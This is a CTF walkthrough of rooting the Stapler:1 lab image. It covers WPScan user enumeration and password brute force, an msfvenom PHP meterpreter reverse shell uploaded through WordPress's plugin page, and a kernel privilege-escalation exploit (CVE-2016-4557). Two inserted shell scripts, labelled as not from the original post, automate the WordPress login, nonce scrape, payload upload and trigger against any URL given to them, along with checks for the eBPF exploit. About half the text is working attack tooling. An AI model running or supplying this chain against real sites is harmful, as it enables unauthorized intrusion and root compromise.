Stapler:1 – CTF

This is a walkthrough of how I gained root access to the Stapler:1 image from  This walkthrough is being provided for educational purposes only.  All testing on this image was done in an isolated lab environment.  Understand that using the tools in this walkthrough against a host without permission is against the law.  Be smart, folks, and enjoy the walkthrough.

Full Nmap scan of the host (-p- covers all 65535 TCP ports, -A adds version detection, OS detection and the default scripts):

root@kali:~# nmap -p- -A


There are a lot of ports/services to enumerate here.  After some time, my enumeration of port 12380 uncovered some interesting things.

Enumerating port 12380 using Nikto:

root@kali:~# nikto -h


The Nikto scan found a robots.txt file with two entries.  Investigating these brings me to a WordPress page.


Using WPScan to get version and plugin info:

root@kali:~# wpscan --url


The WordPress version is 4.2.1.  I didn’t find anything useful regarding plugins or their versions.

Using WPScan to enumerate users:

root@kali:~# wpscan -u --enumerate u


Using WPScan to brute-force the login (starting with john, the first enumerated user):

root@kali:~# wpscan -u --wordlist /usr/share/wordlists/rockyou.txt --username john


I am able to log in to WordPress using the credentials john/incorrect.  Now to create a reverse shell payload.

Creating the reverse shell payload using msfvenom (php/meterpreter_reverse_tcp is the stageless variant, so the whole payload lives in the single .php file; the handler must be set to the same payload name):

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=4444 -f raw > shell235.php


Uploading my .php reverse shell to the plugins page:

Browse to Plugins -> Add New -> Upload Plugin.  Select the PHP payload and upload it.  In my case, the file is shell235.php.


After clicking Install Now, the next page asks for an FTP path and FTP credentials.  That prompt appears because WordPress cannot write to the plugin directory directly and wants filesystem credentials to unpack the "plugin", but the raw file has already been saved under wp-content/uploads/ before that step, so you don’t have to enter anything here.

Verifying the .php file has been uploaded:


As you can see, my shell235.php is here.  Now let’s get our Metasploit handler ready to catch this shell.

Metasploit handler options:


Execute the reverse shell by clicking on shell235.php:
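The login, upload and trigger steps above, as an added shell example that is not from the original post: it assumes a placeholder WP_URL (the page does not show the blog URL), the john/incorrect credentials and the shell235.php file the author generated, and the WordPress plugin-upload form field names (pluginzip, _wpnonce, install-plugin-submit), which come from the WordPress source rather than from the page.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: the WordPress steps above
# (log in, upload the PHP payload through Upload Plugin, request the file) driven
# by curl. Assumptions: WP_URL is a placeholder (the blog URL is not on the page),
# the john/incorrect credentials the author recovered, and shell235.php from msfvenom.
set -eu

WP_URL="${WP_URL:-https://TARGET:12380/blogblog}"   # assumed; set to the real blog URL
WP_USER="${WP_USER:-john}"
WP_PASS="${WP_PASS:-incorrect}"
PAYLOAD="${PAYLOAD:-shell235.php}"
JAR=$(mktemp)                                        # cookie jar shared by every request

req() { curl -sk -b "$JAR" -c "$JAR" "$@"; }          # -k: self-signed cert in the lab

extract_nonce() {
  # update.php?action=upload-plugin is gated by a "plugin-upload" nonce that the
  # upload form renders as <input ... name="_wpnonce" value="...">; read the HTML on stdin.
  grep -o 'name="_wpnonce" value="[^"]*"' | head -n1 | sed 's/.*value="\([^"]*\)"/\1/'
}

login() {
  # GET first so wordpress_test_cookie is set; WordPress rejects the POST without it.
  req -o /dev/null "$WP_URL/wp-login.php"
  code=$(req -o /dev/null -w '%{http_code}' \
    --data-urlencode "log=$WP_USER" --data-urlencode "pwd=$WP_PASS" \
    --data-urlencode "wp-submit=Log In" --data-urlencode "testcookie=1" \
    "$WP_URL/wp-login.php")
  # Success redirects (302) into wp-admin; a bad password re-renders the form (200).
  [ "$code" = "302" ]
}

upload_payload() {
  # Same form as Plugins -> Add New -> Upload Plugin. The file field is "pluginzip".
  # WordPress stores the upload under wp-content/uploads/ before it asks for filesystem
  # (FTP) credentials to unpack it, which is why a bare .php survives that prompt.
  nonce=$(req "$WP_URL/wp-admin/plugin-install.php?tab=upload" | extract_nonce)
  [ -n "$nonce" ] || { echo "no upload nonce: login failed or user cannot install plugins" >&2; return 1; }
  req -o /dev/null -w 'upload HTTP %{http_code}\n' \
    -F "_wpnonce=$nonce" -F "_wp_http_referer=/wp-admin/plugin-install.php?tab=upload" \
    -F "pluginzip=@$PAYLOAD;type=application/octet-stream" \
    -F "install-plugin-submit=Install Now" \
    "$WP_URL/wp-admin/update.php?action=upload-plugin"
}

trigger() {
  # Request the uploaded file. Whether it sits directly in uploads/ or in a
  # year/month subfolder depends on the media settings, so try both. The request
  # stays open while the meterpreter session lives, so cap it and let the handler take over.
  for p in "wp-content/uploads/$PAYLOAD" "wp-content/uploads/$(date +%Y/%m)/$PAYLOAD"; do
    echo "requesting $WP_URL/$p"
    req -o /dev/null --max-time 10 "$WP_URL/$p" || true
  done
}

# Handler, started in a second terminal first (LHOST is assumed), equivalent to the
# multi/handler the author configures; the payload name must match the msfvenom one:
#   msfconsole -q -x 'use exploit/multi/handler; set payload php/meterpreter_reverse_tcp; set LHOST 10.0.0.1; set LPORT 4444; run'

if [ "${1:-}" = "run" ]; then
  login || { echo "login failed" >&2; exit 1; }
  upload_payload
  trigger
fi
```

Run it as `WP_URL=https://host:12380/path ./wp_upload.sh run` with the handler already listening. The nonce scrape is the step that usually breaks when this is scripted against a different WordPress build: if the user is not allowed to install plugins, the upload tab has no form and the script stops there instead of posting a file nowhere.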


Catching low privilege shell:


As you can see from the screenshot, we are connected as the low-privilege user www-data.

OS enumeration provides the kernel and the Linux distribution/version:


Searching the local Exploit DB for privilege escalation vulnerabilities:

root@kali:~# searchsploit linux kernel 4.4 Ubuntu 16
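The OS enumeration and searchsploit query above, as an added shell example that is not from the original post: it builds the same search terms from uname -r and /etc/os-release, and adds the pre-flight check a practitioner wants before choosing an unprivileged eBPF exploit, namely whether kernel.unprivileged_bpf_disabled blocks the bpf() syscall. File paths are passed in as parameters so the functions can be exercised against constructed os-release and sysctl files.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: derive the searchsploit
# terms from the OS enumeration step and run the pre-flight checks that decide
# whether an unprivileged eBPF exploit like the one chosen below is worth trying.
# Inputs are passed in as values/paths so the functions can be run against a
# constructed os-release or sysctl file on any box.
set -eu

kernel_series() {
  # "4.4.0-21-generic" -> "4.4": Exploit-DB titles name the major.minor series.
  printf '%s\n' "$1" | sed -E 's/^([0-9]+\.[0-9]+).*/\1/'
}

distro_terms() {
  # NAME="Ubuntu" and VERSION_ID="16.04" from an os-release file -> "Ubuntu 16"
  # (first word of NAME, major part of VERSION_ID).
  name=$(sed -nE 's/^NAME="?([^"]*)"?$/\1/p' "$1")
  ver=$(sed -nE 's/^VERSION_ID="?([^"]*)"?$/\1/p' "$1")
  printf '%s %s\n' "${name%% *}" "${ver%%.*}"
}

searchsploit_terms() {
  # Reproduces the author's query: "linux kernel 4.4 Ubuntu 16".
  printf 'linux kernel %s %s\n' "$(kernel_series "$1")" "$(distro_terms "$2")"
}

unprivileged_bpf() {
  # CVE-2016-4557 is reached through the bpf() syscall from an unprivileged
  # process. kernel.unprivileged_bpf_disabled (present since 4.4) set to 1
  # closes that door, so check it before bothering to compile anything.
  f="${1:-/proc/sys/kernel/unprivileged_bpf_disabled}"
  if [ ! -e "$f" ]; then
    echo "unknown (sysctl absent)"
  elif [ "$(cat "$f")" = "0" ]; then
    echo "allowed"
  else
    echo "blocked"
  fi
}

if [ "${1:-}" = "run" ]; then
  terms=$(searchsploit_terms "$(uname -r)" /etc/os-release)
  echo "searchsploit $terms"
  echo "unprivileged bpf(): $(unprivileged_bpf)"
  command -v gcc >/dev/null || echo "no gcc on the target: compile elsewhere against the same glibc"
  searchsploit $terms 2>/dev/null || echo "searchsploit not installed here"
fi
```

On the target, `./enum.sh run` prints the query to feed searchsploit on the attacking box and whether unprivileged bpf() is reachable; "blocked" means this particular exploit class is off the table regardless of the kernel version string.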


Identified a local privilege escalation exploit: EDB-ID 39772 / CVE-2016-4557, a use-after-free caused by a double fdput() in the eBPF verifier (kernel/bpf/verifier.c), fixed upstream in 4.5.5.  PoC code can be found/downloaded here:

Transferred the exploit code using wget:



Compiled the exploit:



Running the exploit code:

www-data@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput


Exploit code worked!

Flag.txt file:

cat /root/flag.txt


